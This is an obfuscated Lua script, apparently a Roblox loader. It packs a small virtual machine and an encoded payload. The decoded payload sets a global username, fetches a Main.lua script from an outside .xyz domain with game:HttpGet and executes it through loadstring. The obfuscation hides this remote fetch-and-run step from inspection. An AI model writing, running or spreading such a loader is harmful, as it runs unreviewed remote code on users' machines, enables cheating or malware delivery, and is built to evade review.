--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v73=v2(v0(v30,16));if v19 then local v91=v5(v73,v19);v19=nil;return v91;else return v73;end end end);local function v20(v31,v32,v33)if v33 then local v74=483 -(194 + 289) ;local v75;while true do if (v74==0) then v75=(v31/((62 -(8 + 52))^(v32-((2322 -877) -(1262 + 182)))))%(2^(((v33-(1979 -(1960 + 18))) -(v32-(1 + 0))) + (4 -3))) ;return v75-(v75%((2333 -(510 + 896)) -(305 + 621))) ;end end else local v76=0 -0 ;local v77;while true do if (v76==(0 -0)) then v77=(1147 -(635 + 510))^(v32-((4 + 0) -(4 -1))) ;return (((v31%(v77 + v77))>=v77) and 1) or (0 -0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1902 -(1638 + 255 + 9) ;local v36;local v37;while true do if ((1915 -(1846 + 68))==v35) then return (v37 * 256) + v36 ;end if (v35==(738 -(714 + 24))) then v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + 2 + (1618 -(672 + 946)) ;v35=1;end end end local function v23()local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 1 + 2 );v18=v18 + (5 -1) ;v38=1112 -(496 + 615) ;end if (v38==(1 + 0)) then return (v42 * 16777216) + (v41 * 65536) + (v40 * (1378 -(694 + 428))) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,4 -3 ,20) * ((2 + 0)^(23 + 9))) + v43 ;local v47=v20(v44,4 + 17 ,1014 -(458 + (1592 -1067)) );local v48=((v20(v44,2009 -(970 + 1007) )==(292 -(227 + 64))) and  -(2 -(260 -(19 + 240)))) or (2 -1) ;if (v47==(286 -(151 + 135))) then if (v46==(287 -(267 + 20))) then return v48 * (0 + 0) ;else local v92=0 + 0 + 0 ;while true do if (((437 + 1390) -(20 + 1807))==v92) then v47=1 + 0 ;v45=(3097 -(1523 + 221)) -(1088 + 265) ;break;end end end elseif (v47==(1157 + 890)) then return ((v46==(1354 -(625 + 729))) and (v48 * ((121 -(99 + (196 -(95 + 80))))/0))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((362 -(343 + 17))^52))) ;end local function v25(v49)local v50=1678 -(1458 + 220) ;local v51;local v52;while true do if (v50==(1 -0)) then v51=v3(v16,v18,(v18 + v49) -(2 -(1 -0)) );v18=v18 + v49 ;v50=883 -(684 + 197) ;end if ((0 + 0)==v50) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=2 -1 ;end if (v50==2) then v52={};for v93=1 + (0 -0) , #v51 do v52[v93]=v2(v1(v3(v51,v93,v93)));end v50=2 + 1 ;end if (v50==(12 -9)) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53~=(13 -9)) then else while true do if (v54~=2) then else local v99=0 + 0 ;while true do if (v99==(321 -(305 + 15))) then v54=5 -2 ;break;end if (v99==(1729 -(1160 + 569))) then v59=nil;v60=nil;v99=1;end end end if (v54==1) then v57=nil;v58=nil;v54=2;end if (v54==(0 + 0)) then local v100=1345 -(955 + 390) ;while true do if (1==v100) then v54=232 -(28 + 203) ;break;end if (v100~=0) then else v55=0 -0 ;v56=nil;v100=1;end end end if (3~=v54) then else v61=nil;while true do local v103=0 -0 ;while true do if (v103==1) then if (v55==0) then local v104=0;while true do if (v104~=(15 -(7 + 8))) then else local v133=0 -0 ;while true do if (v133==(1 -0)) then v104=1 + 0 ;break;end if (v133==0) then v56={};v57={};v133=1780 -(999 + 780) ;end end end if (1~=v104) then else v58={};v55=2 -1 ;break;end end end if (3~=v55) then else for v113=1 + 0 ,v23() do v57[v113-(2 -1) ]=v28();end for v115=1,v23() do v58[v115]=v23();end return v59;end break;end if (v103~=0) then else if (v55~=(1 + 1)) then else local v105=0;local v106;while true do if ((1004 -(677 + 327))~=v105) then else v106=1297 -(1241 + 56) ;while true do if ((0 + 0)==v106) then local v144=0 + 0 ;while true do if (v144~=(0 -0)) then else for v156=1,v60 do local v157=1066 -(940 + 126) ;local v158;local v159;local v160;local v161;local v162;while true do if (v157==(542 -(312 + 230))) then v158=0 + 0 ;v159=nil;v157=1;end if (v157~=1) then else v160=nil;v161=nil;v157=2;end if (v157==2) then v162=nil;while true do if (v158==(530 -(47 + 483))) then v159=0;v160=nil;v158=1642 -(332 + 1309) ;end if (1~=v158) then else local v170=0 + 0 ;while true do if ((0 -0)~=v170) then else v161=nil;v162=nil;v170=1;end if ((1004 -(168 + 835))==v170) then v158=2;break;end end end if (v158==(4 -2)) then while true do if (v159==1) then v162=nil;while true do if (v160~=0) then else local v179=0;local v180;while true do if (v179==(1186 -(612 + 574))) then v180=0 + 0 ;while true do if (v180==1) then v160=3 -2 ;break;end if (v180==(500 -(279 + 221))) then local v188=0 -0 ;while true do if (v188~=(3 -2)) then else v180=1;break;end if (v188==0) then v161=v21();v162=nil;v188=1;end end end end break;end end end if (v160==(652 -(411 + 240))) then if (v161==(1 -0)) then v162=v21()~=(0 -0) ;elseif (v161==2) then v162=v24();elseif (v161~=(1151 -(958 + 190))) then else v162=v25();end v61[v156]=v162;break;end end break;end if (v159==0) then v160=99 -(93 + 6) ;v161=nil;v159=1;end end break;end end break;end end end v59[1109 -(65 + 1041) ]=v21();v144=1027 -(407 + 619) ;end if (1==v144) then v106=1;break;end end end if (1~=v106) then else for v147=1,v23() do local v148=0;local v149;local v150;while true do if (v148==(1 + 0)) then while true do if (v149==(0 -0)) then v150=v21();if (v20(v150,1 + 0 ,1)==0) then local v164=0;local v165;local v166;local v167;while true do if ((788 -(589 + 196))~=v164) then else if (v20(v166,6 -3 ,8 -5 )==1) then v167[4]=v61[v167[4 + 0 ]];end v56[v147]=v167;break;end if (v164==2) then local v172=0;while true do if (v172==(0 + 0)) then if (v20(v166,1 + 0 ,200 -(138 + 61) )~=1) then else v167[927 -(341 + 584) ]=v61[v167[2 -0 ]];end if (v20(v166,2,2)~=1) then else v167[13 -10 ]=v61[v167[1 + 2 ]];end v172=1286 -(195 + 1090) ;end if (v172~=1) then else v164=1 + 2 ;break;end end end if ((1 + 0)==v164) then local v173=0 -0 ;while true do if (v173~=(1 + 0)) then else v164=1683 -(913 + 768) ;break;end if (v173==(1845 -(149 + 1696))) then local v177=0;while true do if (v177==(2 -1)) then v173=1;break;end if (v177==0) then v167={v22(),v22(),nil,nil};if (v165==0) then local v186=0;local v187;while true do if (v186~=0) then else v187=479 -(276 + 203) ;while true do if (v187~=(0 + 0)) then else v167[3 + 0 ]=v22();v167[4]=v22();break;end end break;end end elseif (v165==(2 -1)) then v167[8 -5 ]=v23();elseif (v165==(1 + 1)) then v167[3]=v23() -((7 -5)^(341 -(40 + 285))) ;elseif (v165==3) then local v193=0;local v194;while true do if (v193==0) then v194=0;while true do if (0==v194) then v167[1416 -(1391 + 22) ]=v23() -((4 -2)^16) ;v167[2 + 2 ]=v22();break;end end break;end end end v177=1;end end end end end if (0==v164) then local v174=0 -0 ;while true do if ((0 -0)==v174) then local v178=0;while true do if (0~=v178) then else v165=v20(v150,4 -2 ,1568 -(680 + 885) );v166=v20(v150,2 + 2 ,22 -16 );v178=1;end if (v178~=(777 -(314 + 462))) then else v174=1;break;end end end if ((1 + 0)==v174) then v164=3 -2 ;break;end end end end end break;end end break;end if (v148~=(0 -0)) then else local v163=0 -0 ;while true do if (v163~=1) then else v148=1 + 0 ;break;end if (v163==0) then v149=0;v150=nil;v163=1 + 0 ;end end end end end v55=83 -(51 + 29) ;break;end end break;end end end if (v55~=(1187 -(97 + 1089))) then else local v107=0 + 0 ;local v108;while true do if (v107==0) then v108=0 -0 ;while true do if (v108==1) then v61={};v55=2;break;end if (v108==(0 -0)) then v59={v56,v57,nil,v58};v60=v23();v108=1 -0 ;end end break;end end end v103=1 -0 ;end end end break;end end break;end if (v53==(0 + 0)) then v54=929 -(133 + 796) ;v55=nil;v53=3 -2 ;end if (v53~=(4 -2)) then else v58=nil;v59=nil;v53=4 -1 ;end if (v53==(3 + 0)) then v60=nil;v61=nil;v53=4;end if (v53==1) then v56=nil;v57=nil;v53=2;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1 ;local function v72()local v78=v65;local v79=v66;local v80=v67;local v81=v27;local v82={};local v83={};local v84={};for v88=0,v71 do if ((v88>=v80) or ((490 -335)>(2023 -1324))) then v82[v88-v80 ]=v70[v88 + (1138 -(130 + 1007)) ];else v84[v88]=v70[v88 + (2 -1) ];end end local v85=(v71-v80) + 1 + 0 + 0 ;local v86;local v87;while true do local v89=0;while true do if ((v89==(0 + (0 -0))) or ((11252 -(8042 -(343 + 633)))<=(3669 -1581))) then v86=v78[v68];v87=v86[395 -(373 + 21) ];v89=1187 -(920 + 266) ;end if (((1973 -(324 + 235 + 656))<=(4026 -(24 + 1331))) and (v89==(1 -0))) then if ((v87<=((844 + 903) -(801 + 941))) or (((6964 -3313) -(288 + 357))<=2264)) then if ((3359==((17346 -12942) -(208 + 777 + 60))) and (v87<=(619 -(61 + 556)))) then if ((v87<=(0 -0)) or ((2149 + 30)<=((892 + 2583) -(1273 + 341)))) then v84[v86[2 -(0 + 0) ]]=v86[4 -1 ]~=0 ;elseif (((944 + 1297)==(3613 -1372)) and (v87==(1 + 0))) then local v117=0 + 0 ;local v118;local v119;while true do if ((((3171 + 4034) -3993)==(9212 -6000)) and ((0 -0)==v117)) then v118=v86[1626 -(1061 + 563) ];v119=v84[v86[1 + 1 + 1 ]];v117=1 + 0 ;end if (((6247 -3649)==(4012 -(646 + 768))) and (v117==1)) then v84[v118 + (3 -2) ]=v119;v84[v118]=v119[v86[4]];break;end end else v84[v86[258 -(213 + 43) ]]();end elseif (((189 + 200)==389) and (v87<=(11 -8))) then local v110=0 + 0 ;local v111;local v112;while true do if (((6086 -(372 + 830))>=(5104 -1215)) and (v110==(0 + 0))) then local v134=789 -(332 + 457) ;while true do if (((4809 -(36 + 95))<4816) and (v134==(1 -0))) then v110=1 -0 ;break;end if ((v134==((245 + 130) -(172 + 203))) or ((145 + 1845)<=(3172 -2426))) then v111=0 -0 ;v112=nil;v134=2 -1 ;end end end if (((249 + 1445)>(482 -248)) and (v110==1)) then while true do if ((0==v111) or ((956 + 3426)<=(3165 -1838))) then v112=v86[1 + 1 ];v84[v112]=v84[v112](v13(v84,v112 + (3 -2) ,v69));break;end end break;end end elseif (((1484 + 580)>=(2352 -(263 + 1222))) and (v87>4)) then v68=v86[(2 + 3) -2 ];elseif (((1564 + 1905)<(1888 + 2400)) and (v84[v86[1144 -(317 + 825) ]]==v86[2 + 2 ])) then v68=v68 + (3 -2) ;else v68=v86[3];end elseif ((v87<=(17 -9)) or ((298 + 3814)<=(4359 -(366 + 224)))) then if ((492>=((2901 -1942) -697)) and (v87<=(1098 -(794 + 298)))) then do return;end elseif ((v87>((15 -10) + 2)) or ((291 + 643)>3707)) then v84[v86[2]]=v64[v86[3]];else for v135=v86[2],v86[1 + 2 ] do v84[v135]=nil;end end elseif ((v87<=(1 + 9)) or ((14938 -10676)==(4654 -(103 + 9)))) then if ((v87>(1700 -(739 + 952))) or ((3536 -(435 + (887 -340)))<(1876 -((528 -138) + 1079)))) then v64[v86[1346 -(1130 + 213) ]]=v84[v86[2]];else v84[v86[84 -(66 + 16) ]]=v86[2 + 1 ];end elseif (((1266 -(229 + 493))<(4413 -((1349 -959) + (2401 -(222 + 1649))))) and (v87>(1890 -(111 + 1768)))) then local v127=0 + 0 ;local v128;local v129;local v130;local v131;local v132;while true do if (((3 -2)==v127) or ((2170 + 2369)==(20738 -15898))) then v130=nil;v131=nil;v127=(1860 -(323 + 510)) -(896 + 129) ;end if (((5397 -(234 + 1175))>(155 + 83 + 2082)) and (v127==(0 + 0))) then v128=0 -0 ;v129=nil;v127=1;end if (((12874 -8750)>(1135 -(81 + 328))) and (v127==(2 + 0))) then v132=nil;while true do if ((v128==1) or (((11737 -6127) -(766 + 72))<=(288 + 820))) then v69=(v131 + v129) -(4 -3) ;v132=0;v128=4 -(2 + 0) ;end if (((366 + 1128)<4212) and (v128==(1 + 1 + 0))) then for v153=v129,v69 do local v154=0 -0 ;local v155;while true do if (((248 + 3057)>=(2701 + 195)) and (v154==(0 + 0))) then v155=0 + 0 ;while true do if ((v155==(777 -(515 + 262))) or ((2596 -1273)==((6365 -2223) -2198))) then v132=v132 + 1 ;v84[v153]=v130[v132];break;end end break;end end end break;end if ((v128==0) or ((1264 -918)>=(4495 -(257 + 250 + 535)))) then v129=v86[(33 -(10 + 16)) -(4 + 1) ];v130,v131=v81(v84[v129](v13(v84,v129 + (1999 -(1100 + 898)) ,v86[3 -0 ])));v128=1;end end break;end end elseif (((8705 -5208)>(3474 -(4 + 2137))) and (v86[1 + (273 -(87 + 185)) ]==v84[v86[7 -3 ]])) then v68=v68 + ((945 -(547 + 395)) -2) ;else v68=v86[3];end v68=v68 + 1 + 0 + 0 ;break;end end end end A,B=v27(v11(v72));if  not A[1] then local v90=v62[4][v68] or "?" ;error("Script error at ["   .. v90   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365724E616D6503113O004D617274616C6979615F726F626C6F2O78030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756100163O0012093O00014O0007000100013O000E0B0001000200013O0004053O00020001001209000100013O00260400010005000100010004053O00050001001209000200033O00120A000200023O001208000200043O001208000300053O002001000300030006001209000500076O000600014O000C000300064O000300023O00022O00020002000100010004053O001500010004053O000500010004053O001500010004053O000200012O00063O00017O00163O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
